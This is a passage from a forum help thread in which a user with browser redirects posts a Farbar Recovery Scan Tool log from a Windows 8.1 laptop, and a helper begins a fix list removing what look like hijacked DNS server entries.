Adware on Windows 9 now "interferes with the connection"

offline
  • Joined: 02 Feb 2013
  • Posts: 82
  • Location: Beograd

Hello everyone,
While browsing the net, Opera, Firefox, IE and Chrome all redirect to other sites, mostly AliExpress and some betting sites (Bet). It hasn't bothered me until now, even though it has been going on for several months. However, now I have to open every page at least twice. Pages load slowly, downloads are bad, etc. For the connection I use an Android 5.1 smartphone as a hotspot connected to the laptop. When I browse directly on the phone there is no problem. Windows Defender doesn't detect anything, and Malwarebytes Anti-Malware supposedly cleaned some trojans, but the problem remained.
So I am asking you for help.
Thanks in advance.

Izveštaj skeniranja od Farbar Recovery Scan Tool (FRST) (x64) Verzija: 07-12-2016
Pokrenuo mm (administrator) na PC_WIN9 (08-12-2016 17:51:38)
Pokrenuto sa C:\Users\mm\Desktop
Učitani Profili: mm (Dostupani Profili: mm)
Platform: Windows 8.1 (Update) (X64) Jezik: srpski (latinica, Srbija)
Internet Explorer Verzija 11 (Podrazumevani pregledač: Opera)
Režim pokretanja sistema: Normal
Vodič za Farbar Recovery Scan Tool: geekstogo.com/forum/topic/335081-frst-t.....scan-tool/

==================== Procesi (Na Beloj Listi) =================

(Ukoliko je stavka unešena u fixlist, proces ce biti zatvoren. Datoteka nece biti premešten.)

(Qualcomm Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(CrypKey (Canada) Ltd.) C:\Windows\System32\Crypserv.exe
(Samsung Electronics CO., LTD.) C:\Program Files (x86)\Samsung\Settings\CmdServer\EasyLauncher.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(arvato digital services llc) C:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Atheros) C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe
(Microsoft Corporation) C:\Windows\System32\alg.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\LogonUI.exe
(Microsoft Corporation) C:\Windows\System32\LogonUI.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
() C:\Program Files (x86)\Samsung\Settings\CmdServer\EasySettingsCmdServer.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Samsung Electronics CO., LTD.) C:\Program Files (x86)\Samsung\Settings\sSettings.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(Samsung Electronics CO., LTD.) C:\Program Files (x86)\Samsung\SW Update\SWMAgent.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(MyCity) C:\Program Files (x86)\MCShield\MCShieldRTM.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Samsung Electronics CO., LTD.) C:\Program Files\Samsung\S Agent\CommonAgent.exe
() C:\Program Files\Samsung\Support Center\GuaranaAgent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(Opera Software) C:\Program Files (x86)\Opera\41.0.2353.69\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\41.0.2353.69\opera_crashreporter.exe
(Opera Software) C:\Program Files (x86)\Opera\41.0.2353.69\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\41.0.2353.69\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\41.0.2353.69\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\41.0.2353.69\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\41.0.2353.69\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\41.0.2353.69\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\41.0.2353.69\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\41.0.2353.69\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\41.0.2353.69\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\41.0.2353.69\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\41.0.2353.69\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\41.0.2353.69\opera.exe

==================== Registar (Na Beloj Listi) ====================

(Ukoliko je stavka unešena u fixlist, registru stavka ce biti vraćena na podrazumevanu vrednost ili uklonjena. Datoteka neće biti premeštena.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13191824 2012-08-10] (Realtek Semiconductor)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [277504 2012-07-09] (Intel Corporation)
Winlogon\Notify\igfxcui: igfxdev.dll [X]
HKU\S-1-5-21-2752827468-2828176534-1369462658-1001\...\Run: [MCShield Monitor] => C:\Program Files (x86)\MCShield\mcshieldrtm.exe [650816 2014-04-11] (MyCity)
HKU\S-1-5-21-2752827468-2828176534-1369462658-1001\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-2752827468-2828176534-1369462658-1001\...\Run: [Google Update] => C:\Users\mm\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-30] (Google Inc.)
HKU\S-1-5-21-2752827468-2828176534-1369462658-1001\...\MountPoints2: I - "I:\Start07.exe"
HKU\S-1-5-21-2752827468-2828176534-1369462658-1001\...\MountPoints2: {40a283e4-0313-11e3-be8a-50b7c3b4500e} - "G:\Autorun.exe"
HKU\S-1-5-21-2752827468-2828176534-1369462658-1001\...\MountPoints2: {5760188e-2c76-11e3-beaa-50b7c3b4500d} - "G:\Autorun.exe"
HKU\S-1-5-21-2752827468-2828176534-1369462658-1001\...\MountPoints2: {b86b7c4c-0309-11e3-be87-806e6f6e6963} - "G:\Autorun.exe"
HKU\S-1-5-21-2752827468-2828176534-1369462658-1001\...\MountPoints2: {da29b931-fb6b-11e5-bf89-208984108bb0} - "G:\Lenovo_Suite.exe"
HKLM\...\Providers\Internet Print Provider: inetpp.dll
HKLM\...\Providers\LanMan Print Services: win32spl.dll

==================== Internet (Na Beloj Listi) ====================

(Ukoliko je stavka unešena u fixlist, ako je to registru stavka, biće uklonjena ili vraćena na podrazumevanu vrednost.)

Hosts: Postoji više od jednog unosa u Hosts. Pogledati Hosts sekciju iz Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.43.1
Tcpip\Parameters: [NameServer] 8.8.8.8,8.8.8.4
Tcpip\..\Interfaces\{335094DD-08C8-4D04-83ED-54B2A09E695F}: [DhcpNameServer] 82.163.142.3
Tcpip\..\Interfaces\{4CDFB077-1447-49F8-A25E-A98FD35BAD2C}: [NameServer] 82.163.142.3 95.211.158.130
Tcpip\..\Interfaces\{4CDFB077-1447-49F8-A25E-A98FD35BAD2C}: [DhcpNameServer] 192.168.43.1
Tcpip\..\Interfaces\{627F5846-FF3A-472B-97D7-ED63E537C666}: [DhcpNameServer] 82.163.142.3
Tcpip\..\Interfaces\{A130A098-8119-459A-B674-237CE86CB682}: [DhcpNameServer] 82.163.142.3

Internet Explorer:
==================
HKU\S-1-5-21-2752827468-2828176534-1369462658-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.rs/?gws_rd=cr,ssl&ei=s5t0Vc6GF4i3sQHtvKzYBg
URLSearchHook: HKU\S-1-5-21-2752827468-2828176534-1369462658-1001 - (Nema Imena) - {1c95d790-2373-4583-9df1-9b708fa1f778} - Nema Datoteke
SearchScopes: HKLM-x32 -> DefaultScope nedostaje vrednost
SearchScopes: HKU\S-1-5-21-2752827468-2828176534-1369462658-1001 -> DefaultScope {367A1441-34D5-415B-BCFE-6074912A6CFE} URL =
SearchScopes: HKU\S-1-5-21-2752827468-2828176534-1369462658-1001 -> {367A1441-34D5-415B-BCFE-6074912A6CFE} URL =
BHO: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2012-10-31] (Qualcomm Atheros Commnucations)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2014-04-14] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2014-04-14] (Oracle Corporation)
Handler: WSWSVCUchrome - Nema CLSID Vrednosti

FireFox:
========
FF ProfilePath: C:\Users\mm\AppData\Roaming\Mozilla\Firefox\Profiles\7zshftps.default [2016-12-08]
FF Session Restore: Mozilla\Firefox\Profiles\7zshftps.default -> je omogućen
FF Extension: (Firebug) - C:\Users\mm\AppData\Roaming\Mozilla\Firefox\Profiles\7zshftps.default\Extensions\firebug@software.joehewitt.com.xpi [2016-10-15]
FF Extension: (YouTube ALL HTML5) - C:\Users\mm\AppData\Roaming\Mozilla\Firefox\Profiles\7zshftps.default\Extensions\jid1-qj0w91o64N7Eeg@jetpack.xpi [2016-11-28]
FF Extension: (Easy Youtube Video Downloader Express) - C:\Users\mm\AppData\Roaming\Mozilla\Firefox\Profiles\7zshftps.default\Extensions\{b9acf540-acba-11e1-8ccb-001fd0e08bd4}.xpi [2016-11-28]
FF Extension: (Adblock Plus) - C:\Users\mm\AppData\Roaming\Mozilla\Firefox\Profiles\7zshftps.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-11-28]
FF Extension: (User Agent Switcher) - C:\Users\mm\AppData\Roaming\Mozilla\Firefox\Profiles\7zshftps.default\Extensions\{e968fc70-8f95-4ab9-9e79-304de2a71ee1}.xpi [2016-05-17]
FF SearchPlugin: C:\Users\mm\AppData\Roaming\Mozilla\Firefox\Profiles\7zshftps.default\searchplugins\youtube-video-search.xml [2015-08-01]
FF HKLM-x32\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird => nije pronađena
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_23_0_0_207.dll [2016-11-18] ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2013-07-27] (Adobe Systems)
FF Plugin: adobe.com/AdobeExManDetect -> C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\Win64Plugin\npAdobeExManDetectX64.dll [2013-07-14] (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_23_0_0_207.dll [2016-11-18] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-07] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-07] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.55.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-04-14] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.55.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2014-04-14] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3503.0728 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-07-27] (Microsoft Corporation)
FF Plugin-x32: @tracker-software.com/PDF-XChange Editor Plugin,version=1.0,application/pdf -> C:\Program Files\Tracker Software\PDF Editor\npPDFXEditPlugin.x86.dll [Nema Datoteke]
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2013-07-27] (Adobe Systems)
FF Plugin-x32: adobe.com/AdobeExManDetect -> C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\npAdobeExManDetectX86.dll [2013-07-14] (Adobe Systems)
FF Plugin HKU\S-1-5-21-2752827468-2828176534-1369462658-1001: @tools.google.com/Google Update;version=3 -> C:\Users\mm\AppData\Local\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-31] (Google Inc.)
FF Plugin HKU\S-1-5-21-2752827468-2828176534-1369462658-1001: @tools.google.com/Google Update;version=9 -> C:\Users\mm\AppData\Local\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-31] (Google Inc.)

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\mm\AppData\Local\Google\Chrome\User Data\Default [2016-10-16]
CHR Extension: (Google презентације) - C:\Users\mm\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-02-06]
CHR Extension: (Google документи) - C:\Users\mm\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-06]
CHR Extension: (Google диск) - C:\Users\mm\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-19]
CHR Extension: (YouTube) - C:\Users\mm\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-19]
CHR Extension: (Google Search) - C:\Users\mm\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-19]
CHR Extension: (Google табеле) - C:\Users\mm\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-02-06]
CHR Extension: (Google документи офлајн) - C:\Users\mm\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-01-19]
CHR Extension: (WhatFont) - C:\Users\mm\AppData\Local\Google\Chrome\User Data\Default\Extensions\jabopobgcpjmedljpbcaablpmlmfcogm [2015-08-23]
CHR Extension: (Плаћања у Chrome веб-продавници) - C:\Users\mm\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-01-19]
CHR Extension: (Gmail) - C:\Users\mm\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-05-07]

Opera:
=======
OPR Extension: (Bookmarks) - C:\Users\mm\AppData\Roaming\Opera Software\Opera Stable\Extensions\fnlanmpednndkaaaleibncenahckbmhc [2015-12-02]
OPR Extension: (Web Developer) - C:\Users\mm\AppData\Roaming\Opera Software\Opera Stable\Extensions\kddhmaadmaklcieonhggddempagbakph [2016-07-29]
OPR Extension: (Adblock Plus) - C:\Users\mm\AppData\Roaming\Opera Software\Opera Stable\Extensions\oidhhegpmlfpoeialbgcdocjalghfpkp [2016-10-27]

==================== Servisi (Na Beloj Listi) ====================

(Ukoliko je stavka unešena u fixlist, biće uklonjena iz registra. Datoteka neće biti premeštena ukoliko nije izlistana zasebno..)

R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [231040 2012-10-31] (Qualcomm Atheros Commnucations) [Datoteka nije potpisana]
R2 Crypkey License; C:\Windows\SysWOW64\crypserv.exe [122880 2007-03-15] (CrypKey (Canada) Ltd.) [Datoteka nije potpisana]
R2 Easy Launcher; C:\Program Files (x86)\Samsung\Settings\CmdServer\EasyLauncher.exe [1593976 2012-09-05] (Samsung Electronics CO., LTD.)
S3 fussvc; C:\Program Files (x86)\Windows Kits\8.1\App Certification Kit\fussvc.exe [142336 2014-02-19] (Microsoft Corporation) [Datoteka nije potpisana]
R2 IAStorDataMgrSvc; C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [7168 2012-07-09] (Intel Corporation) [Datoteka nije potpisana]
R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [128896 2012-07-18] (Intel Corporation)
R2 IpOverUsbSvc; C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe [22744 2014-10-15] (Microsoft Corporation)
S3 iumsvc; C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe [174368 2014-02-28] ()
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165760 2012-07-18] (Intel Corporation)
R2 PSI_SVC_2_x64; c:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe [337776 2014-04-30] (arvato digital services llc)
S3 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [118520 2013-03-01] (Riverbed Technology, Inc.)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [Datoteka nije potpisana]
S3 Te.Service; C:\Program Files (x86)\Windows Kits\8.1\Testing\Runtimes\TAEF\Wex.Services.exe [119808 2013-08-22] (Microsoft Corporation) [Datoteka nije potpisana]
S3 VsEtwService120; C:\Program Files\Microsoft Visual Studio 12.0\Common7\Packages\Debugger\Services\VsEtwService.exe [89232 2014-07-22] (Microsoft Corporation)
S3 wampapache; c:\wamp\bin\apache\apache2.4.4\bin\httpd.exe [24576 2013-06-23] (Apache Software Foundation) [Datoteka nije potpisana]
S3 wampmysqld; c:\wamp\bin\mysql\mysql5.6.12\bin\mysqld.exe [12867584 2013-06-23] () [Datoteka nije potpisana]
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)
R2 ZAtheros Bt and Wlan Coex Agent; C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe [323584 2012-10-31] (Atheros) [Datoteka nije potpisana]
S3 IDriverT; "C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe" [X]
S2 UI Assistant Service; C:\Program Files (x86)\Vip mobilni internet\AssistantServices.exe [X]
S2 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.1.5.0\WsAppService.exe [X]

===================== Drajveri (Na Beloj Listi) ======================

(Ukoliko je stavka unešena u fixlist, biće uklonjena iz registra. Datoteka neće biti premeštena ukoliko nije izlistana zasebno..)

S3 BTATH_HID; C:\WINDOWS\system32\DRIVERS\btath_hid.sys [222360 2012-10-31] (Qualcomm Atheros)
S3 BTATH_LWFLT; C:\WINDOWS\system32\DRIVERS\btath_lwflt.sys [76952 2012-10-31] (Qualcomm Atheros)
S3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-10-04] (Malwarebytes)
R1 MpKslDrv; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{38DD5A71-DB03-4286-A336-54CA739EF717}\MpKslDrv.sys [44928 2016-12-07] (Microsoft Corporation)
R1 NetworkX; C:\WINDOWS\system32\ckldrv.sys [27904 2007-05-17] ()
R1 NetworkX; C:\Windows\SysWOW64\ckldrv.sys [31846 2006-01-10] () [Datoteka nije potpisana]
R2 NPF; C:\WINDOWS\System32\drivers\npf.sys [36600 2013-03-01] (Riverbed Technology, Inc.)
R3 RadioHIDMini; C:\WINDOWS\System32\drivers\RadioHIDMini.sys [23408 2012-07-27] (Windows (R) Win 7 DDK provider)
R3 SensorsSimulatorDriver; C:\WINDOWS\system32\DRIVERS\WUDFRd.sys [227840 2014-05-31] (Microsoft Corporation)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation)
R2 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation)

==================== NetSvcs (Na Beloj Listi) ===================

(Ukoliko je stavka unešena u fixlist, biće uklonjena iz registra. Datoteka neće biti premeštena ukoliko nije izlistana zasebno..)


==================== Mesec Dana Kreirane Datoteke i Fascikli ========

(Ukoliko je stavka unešena u fixlist, Datoteka/Fascikla će biti premeštena.)

2016-12-08 17:51 - 2016-12-08 17:54 - 00018942 _____ C:\Users\mm\Desktop\FRST.txt
2016-12-08 17:51 - 2016-12-08 17:51 - 00000000 ____D C:\FRST
2016-12-08 17:30 - 2016-12-08 17:31 - 02420224 _____ (Farbar) C:\Users\mm\Desktop\FRST64.exe
2016-12-01 00:05 - 2016-12-08 16:18 - 00000000 ____D C:\Users\mm\Desktop\Ytong
2016-11-29 08:54 - 2016-12-08 00:55 - 00000000 ____D C:\Users\mm\AppData\LocalLow\Mozilla
2016-11-28 15:33 - 2016-12-07 21:53 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox

==================== Mesec Dana Modifikovane Datoteke i Fascikli ========

(Ukoliko je stavka unešena u fixlist, Datoteka/Fascikla će biti premeštena.)

2016-12-08 17:31 - 2013-08-22 16:36 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-12-08 17:30 - 2015-12-13 19:40 - 00000000 ____D C:\Users\mm\AppData\Roaming\uTorrent
2016-12-08 17:16 - 2013-08-14 12:53 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-12-08 17:13 - 2015-02-03 10:10 - 00000912 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-2752827468-2828176534-1369462658-1001UA.job
2016-12-08 12:31 - 2013-11-14 08:32 - 00006262 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-12-08 12:31 - 2013-08-17 11:35 - 45079414 _____ C:\WINDOWS\system32\perfh01A.dat
2016-12-08 12:31 - 2013-08-17 11:35 - 14896852 _____ C:\WINDOWS\system32\perfc01A.dat
2016-12-08 12:29 - 2015-01-13 13:53 - 00000000 ____D C:\Users\mm\AppData\Local\Adobe
2016-12-08 10:37 - 2013-08-22 14:36 - 00000000 ____D C:\WINDOWS\Inf
2016-12-08 09:12 - 2013-12-25 20:34 - 00000000 ____D C:\ProgramData\MCShield
2016-12-08 08:39 - 2015-08-10 08:03 - 00013098 _____ C:\IFRToolLog.txt
2016-12-08 08:36 - 2012-11-16 10:42 - 00000000 ____D C:\ProgramData\WinClon
2016-12-07 20:08 - 2015-12-29 19:16 - 00000000 ____D C:\Users\mm\Desktop\VOX
2016-11-29 08:54 - 2015-05-02 17:45 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-11-28 19:39 - 2016-10-31 14:26 - 00000000 ____D C:\Users\mm\Desktop\Akcija
2016-11-26 23:06 - 2016-05-11 21:18 - 00000892 _____ C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job
2016-11-25 20:52 - 2014-05-31 13:20 - 00000000 ___RD C:\Users\mm\NeodgledaniFilmovi
2016-11-25 19:07 - 2013-08-12 05:59 - 00003600 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2752827468-2828176534-1369462658-1001
2016-11-25 18:23 - 2016-06-03 19:18 - 00001063 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk
2016-11-25 18:23 - 2014-09-24 17:12 - 00003862 _____ C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 1380840746
2016-11-25 18:23 - 2013-10-03 23:52 - 00000000 ____D C:\Program Files (x86)\Opera
2016-11-22 09:58 - 2013-08-22 16:36 - 00000000 ___HD C:\Program Files\WindowsApps
2016-11-22 09:58 - 2013-08-22 16:36 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-11-18 22:17 - 2015-04-08 14:10 - 00000000 ____D C:\Users\mm\Desktop\Web_Inspiracija
2016-11-18 20:18 - 2016-05-11 21:18 - 00003848 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player PPAPI Notifier
2016-11-18 20:18 - 2013-08-22 16:36 - 00000000 ____D C:\WINDOWS\system32\Macromed
2016-11-18 20:18 - 2013-08-14 12:53 - 00003718 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2016-11-18 20:17 - 2013-08-22 16:36 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2016-11-18 12:23 - 2015-02-03 10:12 - 00002395 _____ C:\Users\mm\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-11-15 14:22 - 2015-02-24 21:27 - 00000000 ____D C:\SymCache
2016-11-14 01:13 - 2014-01-27 22:38 - 00000498 _____ C:\WINDOWS\system32\Drivers\etc\hosts.ics
2016-11-14 01:13 - 2013-08-22 15:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-11-14 01:13 - 2013-08-22 15:44 - 05472264 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-11-14 01:11 - 2013-08-22 14:25 - 00524288 ___SH C:\WINDOWS\system32\config\BBI

==================== Datoteke u korenu nekih direktorijuma =======

2013-07-22 03:39 - 2013-07-22 03:39 - 2174976 _____ (Advanced Micro Devices Inc.) C:\Program Files (x86)\Common Files\atimpenc.dll
2015-05-28 10:26 - 2015-07-06 13:09 - 0000521 _____ () C:\Users\mm\AppData\Roaming\.csshat
2015-05-21 23:01 - 2016-05-03 11:48 - 0000132 _____ () C:\Users\mm\AppData\Roaming\Adobe PNG Format CS6 Prefs
2013-08-16 10:40 - 2013-08-16 15:06 - 0803840 ____H () C:\Users\mm\AppData\Roaming\base_en.db
2015-01-23 21:09 - 2016-04-13 13:54 - 0000794 _____ () C:\Users\mm\AppData\Roaming\burnaware.ini
2015-04-14 21:41 - 2016-10-17 14:01 - 0001456 _____ () C:\Users\mm\AppData\Local\Adobe Save for Web 13.0 Prefs
2013-12-05 01:40 - 2015-12-26 00:04 - 0004608 _____ () C:\Users\mm\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-05-13 17:59 - 2014-05-13 17:59 - 0000218 _____ () C:\Users\mm\AppData\Local\recently-used.xbel
2013-11-25 23:22 - 2015-04-08 06:58 - 0007626 _____ () C:\Users\mm\AppData\Local\resmon.resmoncfg
2012-11-16 10:53 - 2012-08-08 05:07 - 2258432 _____ (Samsung Electronics) C:\ProgramData\MakeMarkerFile.exe
2012-11-16 10:53 - 2012-08-07 11:11 - 0003196 _____ () C:\ProgramData\MakeMarkerFile.xml

==================== Bamital & volsnap ======================

(Ne postoji automatizovan popravak za datoteke koji nisu prošle verifikaciju.)

C:\WINDOWS\system32\winlogon.exe => Datoteka je digitalno potpisana
C:\WINDOWS\system32\wininit.exe => Datoteka je digitalno potpisana
C:\WINDOWS\explorer.exe => Datoteka je digitalno potpisana
C:\WINDOWS\SysWOW64\explorer.exe => Datoteka je digitalno potpisana
C:\WINDOWS\system32\svchost.exe => Datoteka je digitalno potpisana
C:\WINDOWS\SysWOW64\svchost.exe => Datoteka je digitalno potpisana
C:\WINDOWS\system32\services.exe => Datoteka je digitalno potpisana
C:\WINDOWS\system32\User32.dll => Datoteka je digitalno potpisana
C:\WINDOWS\SysWOW64\User32.dll => Datoteka je digitalno potpisana
C:\WINDOWS\system32\userinit.exe => Datoteka je digitalno potpisana
C:\WINDOWS\SysWOW64\userinit.exe => Datoteka je digitalno potpisana
C:\WINDOWS\system32\rpcss.dll => Datoteka je digitalno potpisana
C:\WINDOWS\system32\dnsapi.dll => Datoteka je digitalno potpisana
C:\WINDOWS\SysWOW64\dnsapi.dll => Datoteka je digitalno potpisana
C:\WINDOWS\system32\Drivers\volsnap.sys => Datoteka je digitalno potpisana


Pažnja!: ==> Nije moguć pristup BCD-u.

LastRegBack: 2016-12-07 11:51

==================== Kraj od FRST.txt ============================


offline
  • Joined: 02 Jan 2008
  • Posts: 2167

Hello!

I would ask you, after the first step, to uninstall:
Google Update Helper


1. Open Notepad (Text Document) and copy the following text from the code box below into it:

CreateRestorePoint:
CloseProcesses:
Tcpip\..\Interfaces\{335094DD-08C8-4D04-83ED-54B2A09E695F}: [DhcpNameServer] 82.163.142.3
Tcpip\..\Interfaces\{4CDFB077-1447-49F8-A25E-A98FD35BAD2C}: [NameServer] 82.163.142.3 95.211.158.130
